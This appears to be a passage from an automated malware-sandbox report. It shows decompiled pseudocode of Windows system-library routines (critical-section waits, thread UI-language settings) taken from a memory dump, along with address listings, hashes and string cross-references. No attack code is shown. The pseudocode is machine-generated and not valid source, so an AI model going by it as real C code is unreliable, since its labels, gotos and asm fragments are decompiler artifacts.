												if(_t250 != 0) {
													goto L106;
												} else {
													_t289 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t325 = E01012C50(_t289, _a8, _t280, _a16, _a20, _a24, _t317);
											L76:
											_v32 = _t325;
											goto L69;
										}
									}
									goto L108;
								} else {
									E00FFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t325 = _a24;
									_t257 = E01012AE4( &_v36, _a8, _t280, _a16, _a20, _t325);
									_v32 = _t257;
									__eflags = _t257 - 0xc0000100;
									if(_t257 == 0xc0000100) {
										_v32 = E01012C50(_v36, _a8, _t280, _a16, _a20, _t325, 1);
									}
									_v8 = _t317;
									E01012ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t243 = _t325;
					}
					L70:
					return E0103D0D1(_t243);
				}
				L108:
			}

0x01012584
0x01012586
0x01012590
0x01012596
0x01012597
0x01012598
0x01012599
0x0101259e
0x010125a4
0x010125a9
0x010125ac
0x010125ae
0x010125b1
0x010125b2
0x010125b5
0x010125b8
0x010125bb
0x010125bc
0x010125bf
0x010125c2
0x010125c5
0x010125c6
0x010125cb
0x010125ce
0x010125d8
0x010125db
0x010125dd
0x010125de
0x010125e1
0x010125e3
0x010125e9
0x010126da
0x010126da
0x010126dd
0x010126e2
0x01055b56
0x00000000
0x010126e8
0x010126f9
0x010126fb
0x010126fe
0x01012700
0x01055b60
0x00000000
0x01012706
0x01012706
0x0101270a
0x0101270a
0x0101270d
0x01012713
0x01012716
0x01012718
0x0101271c
0x0101271e
0x01055b6c
0x01055b6f
0x01055b7f
0x01055b89
0x01055b8e
0x01055b93
0x01055b96
0x01055b9c
0x01055ba0
0x01055ba3
0x01055bab
0x01055bb0
0x01055bb3
0x01055bb3
0x01055ba3
0x01012724
0x01012726
0x01012729
0x0101272c
0x0101279d
0x0101279d
0x010127a0
0x010127a2
0x00000000
0x0101272e
0x0101272e
0x01012731
0x01012734
0x01012734
0x01012736
0x01055bc1
0x01055bc1
0x01055bc4
0x00000000
0x01055bca
0x01055bca
0x01055bcd
0x00000000
0x01055bd3
0x00000000
0x01055bd3
0x01055bcd
0x0101273c
0x0101273c
0x01012742
0x01012747
0x0101274a
0x0101274d
0x01012750
0x00000000
0x01012756
0x01012756
0x00000000
0x01012902
0x01012908
0x0101290b
0x00000000
0x01012911
0x0101291c
0x01012921
0x00000000
0x01012921
0x00000000
0x00000000
0x01012880
0x01012887
0x0101288c
0x00000000
0x00000000
0x01012805
0x0101280a
0x01012814
0x01012816
0x00000000
0x00000000
0x0101281e
0x01012821
0x01012823
0x00000000
0x01012829
0x01012829
0x01012831
0x0101283c
0x0101283e
0x00000000
0x0101283e
0x00000000
0x00000000
0x0101284e
0x01012850
0x01012851
0x01012854
0x01012857
0x0101285a
0x0101285c
0x0101285d
0x00000000
0x00000000
0x0101275d
0x01012761
0x00000000
0x01012767
0x0101276e
0x01012773
0x01012773
0x01012776
0x01012778
0x0101277e
0x0101277e
0x01012781
0x01012781
0x01012783
0x01012784
0x00000000
0x00000000
0x01055bd8
0x01055bde
0x01055be4
0x01055be6
0x01055be8
0x01055be9
0x01055bee
0x01055bf8
0x01055bff
0x01055c01
0x01055c04
0x01055c07
0x01055c0b
0x01055c0d
0x01055c0d
0x01055c15
0x01055c18
0x01055c1b
0x01055c1b
0x01055c1e
0x00000000
0x00000000
0x010128c3
0x010128c8
0x010128d2
0x010128d4
0x010128d8
0x010128db
0x01055c26
0x01055c28
0x01055c2d
0x01055c2d
0x00000000
0x00000000
0x01055c34
0x01055c36
0x01055c49
0x01055c4e
0x01055c54
0x01055c5b
0x01055c5d
0x01055c60
0x01012788
0x01012788
0x0101278b
0x0101278e
0x0101278e
0x0101278e
0x01012791
0x00000000
0x00000000
0x01012756
0x01012750
0x00000000
0x01012794
0x01012794
0x01012795
0x01012798
0x01012798
0x00000000
0x01012734
0x0101272c
0x01012700
0x010125ef
0x010125ef
0x010125ef
0x010125f2
0x010125f8
0x00000000
0x00000000
0x010125fe
0x00000000
0x010128e6
0x010128ec
0x010128ef
0x010128f5
0x010128f8
0x010128f8
0x00000000
0x010128f8
0x00000000
0x00000000
0x01012866
0x01012866
0x01012876
0x01012879
0x00000000
0x00000000
0x010127e0
0x010127e7
0x010127e9
0x010127eb
0x01055afd
0x00000000
0x01055afd
0x00000000
0x00000000
0x01012633
0x01012638
0x0101263b
0x0101263c
0x0101263e
0x01012640
0x01012642
0x01012647
0x01012649
0x0101264e
0x01012650
0x01012653
0x01012659
0x010126a2
0x010126a7
0x010126ac
0x010126b2
0x01055b11
0x01055b15
0x01055b17
0x00000000
0x010126b8
0x010126b8
0x010126ba
0x010127a6
0x010127a6
0x010127a9
0x010127ab
0x010127b9
0x010127b9
0x010127be
0x010127c1
0x010127c3
0x010127c5
0x010127c7
0x01055c74
0x01055c79
0x01055c79
0x010127c7
0x00000000
0x010126c0
0x010126c0
0x010126c3
0x010126c6
0x010126c6
0x010126c9
0x010126c9
0x00000000
0x010126c9
0x010126ba
0x0101265b
0x0101265b
0x0101265e
0x01012667
0x0101266d
0x01012677
0x0101267c
0x0101267f
0x01012681
0x01055b49
0x01055b4e
0x010127cd
0x010127d0
0x010127d1
0x010127d2
0x010127d4
0x010127dd
0x01012687
0x01012687
0x0101268a
0x0101268b
0x0101268e
0x0101268f
0x01012691
0x01012696
0x01012698
0x0101269d
0x0101269f
0x00000000
0x0101269f
0x01012681
0x00000000
0x00000000
0x01012846
0x00000000
0x00000000
0x01012605
0x0101260a
0x0101260c
0x01012611
0x01012616
0x01012619
0x01012619
0x0101261e
0x00000000
0x01012624
0x01012627
0x01012627
0x00000000
0x00000000
0x01055b1f
0x00000000
0x00000000
0x01012894
0x0101289b
0x0101289d
0x010128a1
0x01055b2b
0x01055b2e
0x01055b2e
0x010128a7
0x010128a9
0x01055b04
0x01055b09
0x01055b09
0x01055b09
0x00000000
0x00000000
0x01055b35
0x01055b3c
0x010128fb
0x010128fb
0x010126cc
0x010126cc
0x010126d0
0x00000000
0x010126d2
0x010126d2
0x00000000
0x010126d2
0x00000000
0x00000000
0x010125fe
0x0101292d
0x0101292f
0x01012930
0x01012935
0x01012937
0x01012939
0x0101293c
0x0101293e
0x0101293f
0x01012941
0x01012945
0x01012946
0x01012948
0x0101294e
0x0101294f
0x01012954
0x0101295a
0x0101295c
0x01012962
0x01012963
0x01012965
0x01012966
0x01012968
0x0101296b
0x0101296e
0x0101296f
0x01012971
0x01012974
0x01012980
0x01012981
0x01012982
0x01012983
0x01012984
0x01012985
0x01012986
0x01012987
0x01012988
0x01012989
0x0101298a
0x0101298b
0x0101298c
0x0101298d
0x0101298e
0x0101298f
0x01012990
0x01012992
0x01012997
0x010129a3
0x010129a6
0x010129ab
0x010129ad
0x010129b0
0x010129b2
0x01055c80
0x010129b8
0x010129b8
0x010129bb
0x010129c0
0x010129c5
0x010129c6
0x010129c6
0x010129c9
0x010129cb
0x00000000
0x00000000
0x010129cd
0x010129d0
0x010129d9
0x010129db
0x010129dd
0x01012a7f
0x01012a84
0x01012a87
0x01012a89
0x01055ca1
0x01055ca3
0x00000000
0x01012a8f
0x01012a8f
0x00000000
0x01012a8f
0x00000000
0x010129e3
0x010129e3
0x010129e3
0x00000000
0x010129e3
0x010129dd
0x00000000
0x010129db
0x010129e6
0x010129e9
0x010129eb
0x010129ed
0x010129f3
0x010129f5
0x010129f8
0x010129fa
0x01012a97
0x01012a9a
0x01012a9d
0x01012add
0x00000000
0x01012a9f
0x01012aa2
0x01012aa5
0x01012aa8
0x01012aab
0x01055cab
0x01055caf
0x01055cc5
0x01055cda
0x01055cdc
0x01055cdf
0x01055ce5
0x00000000
0x01055ceb
0x01055ced
0x01055cee
0x00000000
0x01055cee
0x01055cb1
0x01055cb4
0x01055cb9
0x01055cbb
0x00000000
0x01055cbd
0x01055cbd
0x00000000
0x01055cbd
0x01055cbb
0x01012ab1
0x01012ab1
0x01012ac4
0x01012ac6
0x01012ac6
0x00000000
0x01012ac6
0x01012aab
0x00000000
0x01012a00
0x01012a09
0x01012a0e
0x01012a21
0x01012a24
0x01012a35
0x01012a3a
0x01012a3d
0x01012a42
0x01012a59
0x01012a59
0x01012a5c
0x01012a5f
0x01012a5f
0x010129fa
0x010129f3
0x01012a64
0x01012a64
0x01012a6b
0x01012a6b
0x01012a6d
0x01012a72
0x01012a72
0x00000000

Strings

PATH, xrefs: 01012642, 01012691

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: f638929315d0ee638b1fd067c2c0d9508b6e08bcd8109d215c3c2c30738a175c
Instruction ID: cca27a16bf92238830b7feba0443c06178e5c8320f1ecf613b25f0b1912722cc
Opcode Fuzzy Hash: f638929315d0ee638b1fd067c2c0d9508b6e08bcd8109d215c3c2c30738a175c
Instruction Fuzzy Hash: F6C18071D00219DFDB25DF99D881BEEBBF1FF48750F248069E981AB294D738A941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0101FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0101FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E00FFEEF0(0x10d7b60);
					_t134 =  *0x10d7b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x10d7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x10d7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E00FF6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E00FF76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01088938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E00FEB150();
													}
													_t116 = E01086D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E00FF75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x10d8638; // 0x0
																	_t122 = L00FF38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E00FF76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E00FF76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0101FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L00FF70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0101FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0101FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0101FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0101FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0101FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x10d7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x10d7b84 = _t75;
						_t73 = E00FFEB70(_t134, 0x10d7b60);
						if( *0x10d7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E00FFFF60( *0x10d7b20);
							}
						}
						goto L5;
					}
				}
			}

0x0101fab0
0x0101fab2
0x0101fab3
0x0101fab4
0x0101fabc
0x0101fac0
0x0101fb14
0x0101fb17
0x0101fac2
0x0101fac8
0x0101facd
0x0101fad3
0x0101fad3
0x0101fadd
0x0101fb18
0x0101fb1b
0x0101fb1d
0x0101fb1e
0x0101fb1f
0x0101fb20
0x0101fb21
0x0101fb22
0x0101fb23
0x0101fb24
0x0101fb25
0x0101fb26
0x0101fb27
0x0101fb28
0x0101fb29
0x0101fb2a
0x0101fb2b
0x0101fb2c
0x0101fb2d
0x0101fb2e
0x0101fb2f
0x0101fb3a
0x0101fb3b
0x0101fb3e
0x0101fb41
0x0101fb44
0x0101fb47
0x0101fb4a
0x0101fb4d
0x0101fb53
0x0105bdcb
0x0105bdcb
0x0101fb59
0x0101fb5b
0x0101fb5b
0x0101fb5e
0x0105bdd5
0x0105bdd8
0x00000000
0x0105bdda
0x00000000
0x0105bdda
0x0101fb64
0x0101fb64
0x0101fb64
0x0101fb67
0x0101fb6e
0x0101fb70
0x0101fb72
0x00000000
0x0101fb78
0x0101fb7a
0x0101fb7a
0x0101fb7d
0x0101fb80
0x0105bddf
0x0105bde1
0x00000000
0x0105bde3
0x00000000
0x0105bde3
0x0101fb86
0x0101fb86
0x0101fb86
0x0101fb8b
0x0101fb90
0x0101fb92
0x0101fb94
0x0101fb9a
0x0101fb9b
0x0101fba1
0x0105bde8
0x0105bdeb
0x0105bded
0x0105beb5
0x0105beb5
0x0105bebb
0x0105bebd
0x0105bec3
0x0105bed2
0x0105bedd
0x0105bedd
0x0105beed
0x00000000
0x0105bdf3
0x0105bdfe
0x0105be06
0x0105be0b
0x0105be0d
0x0105be0f
0x0105be14
0x0105be19
0x0105be20
0x0105be25
0x0105be27
0x0105be35
0x0105be39
0x0105be46
0x0105be4f
0x0105be54
0x0105be56
0x0105bef8
0x0105bef8
0x00000000
0x0105be5c
0x0105be5c
0x0105be60
0x00000000
0x0105be66
0x0105be66
0x0105be7f
0x0105be84
0x0105be87
0x0105be89
0x0105be8b
0x0105be99
0x0105be9d
0x0105bea0
0x0105beac
0x0105beaf
0x0105beb1
0x0105beb3
0x0105beb3
0x00000000
0x0105bea2
0x0105bea2
0x00000000
0x0105bea2
0x0105be8d
0x0105be8d
0x0105be92
0x00000000
0x0105be92
0x0105be8b
0x0105be60
0x0105be3b
0x0105be3b
0x0105be3e
0x00000000
0x0105be40
0x0105be40
0x0105be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0105be44
0x0105be3e
0x0105be29
0x0105be29
0x00000000
0x0105be29
0x0105be27
0x00000000
0x0101fba7
0x0101fba7
0x0101fbab
0x0105bf02
0x0101fbb1
0x0101fbb1
0x0101fbb8
0x0101fbbd
0x0101fbbd
0x0101fbbf
0x0101fbbf
0x0101fbc5
0x0101fbcb
0x0101fbf8
0x0101fbf8
0x0101fbfa
0x00000000
0x0101fc00
0x0101fc00
0x0101fc03
0x00000000
0x0101fc09
0x0101fc09
0x0101fc0f
0x0101fc15
0x0101fc23
0x0101fc23
0x0101fc25
0x0101fc27
0x0101fc75
0x0101fc7c
0x0101fc84
0x00000000
0x0101fc29
0x0101fc29
0x0101fc2d
0x0101fc30
0x0105bf0f
0x00000000
0x0101fc36
0x0101fc38
0x0101fc3b
0x0101fc41
0x0105bf17
0x0105bf19
0x0105bf48
0x0105bf4b
0x00000000
0x0105bf1b
0x0105bf22
0x0105bf24
0x0105bf26
0x00000000
0x0105bf2c
0x0105bf37
0x0105bf39
0x0105bf3b
0x00000000
0x0105bf41
0x0105bf41
0x0105bf41
0x0105bf41
0x0105bf45
0x00000000
0x0105bf45
0x0105bf3b
0x0105bf26
0x00000000
0x0101fc47
0x0101fc47
0x0101fc49
0x0101fcb2
0x0101fcb4
0x0101fcb6
0x0101fcdc
0x0101fcdc
0x00000000
0x0101fcb8
0x0101fcc3
0x0101fcc5
0x0101fcc7
0x00000000
0x0101fcc9
0x0101fcc9
0x0101fccd
0x00000000
0x0101fccd
0x0101fcc7
0x00000000
0x0101fc4b
0x0101fc4b
0x0101fc4e
0x0101fc4e
0x0101fc51
0x0101fc51
0x0101fc54
0x0101fc5a
0x0101fc5c
0x0101fc5f
0x0101fc61
0x0101fc63
0x0101fc65
0x0101fc67
0x0101fc6e
0x0101fc72
0x0101fc72
0x0101fc72
0x0101fc72
0x0101fc67
0x0101fc61
0x00000000
0x0101fc5a
0x0101fc49
0x0101fc41
0x0101fc30
0x0101fc27
0x0101fc03
0x0101fbcd
0x0101fbd3
0x0101fbd9
0x0101fbdc
0x0101fbde
0x0101fc99
0x0101fc9b
0x0101fc9d
0x0101fcd5
0x0101fcd5
0x0101fc89
0x0101fc89
0x00000000
0x0101fc9f
0x0101fc9f
0x0101fca3
0x00000000
0x0101fca3
0x00000000
0x0101fbe4
0x0101fbe4
0x0101fbe4
0x0101fbe4
0x0101fbe9
0x0101fbf2
0x00000000
0x0101fbf2
0x0101fbde
0x0101fbcb
0x0101fbab
0x0101fc8b
0x0101fc8b
0x0101fc8c
0x0101fb80
0x0101fb72
0x0101fb5e
0x0101fc8d
0x0101fc91
0x0101fadf
0x0101fadf
0x0101fae1
0x0101fae4
0x0101fae7
0x0101faec
0x0101faf8
0x0101fb00
0x0101fb07
0x0101fb0f
0x0101fb0f
0x0101fb07
0x00000000
0x0101faf8
0x0101fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0105BE0F

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: b6098e2873d4be0e2fedf54b6a2ccdea86cdba3b80e2d5960ca514e3c7bf3e7f
Instruction ID: e8382970fc5a2d65bfd155e3eb680463d8e8f5685f145ddc1b5ef14940604bb8
Opcode Fuzzy Hash: b6098e2873d4be0e2fedf54b6a2ccdea86cdba3b80e2d5960ca514e3c7bf3e7f
Instruction Fuzzy Hash: 77A1F431B0060A8BEB61DB68C4507BEB7E5BF44714F0445A9EE82CB695DB38E805DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FE2D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00FE2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x10d5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x10d7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E010297C0();
				}
				if( *0x10d79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x10d79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01011624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01007D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0107FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01029520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0101E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0103DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x10d6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x10d6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01029980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E010295D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01007D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01007D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01067016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0107FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
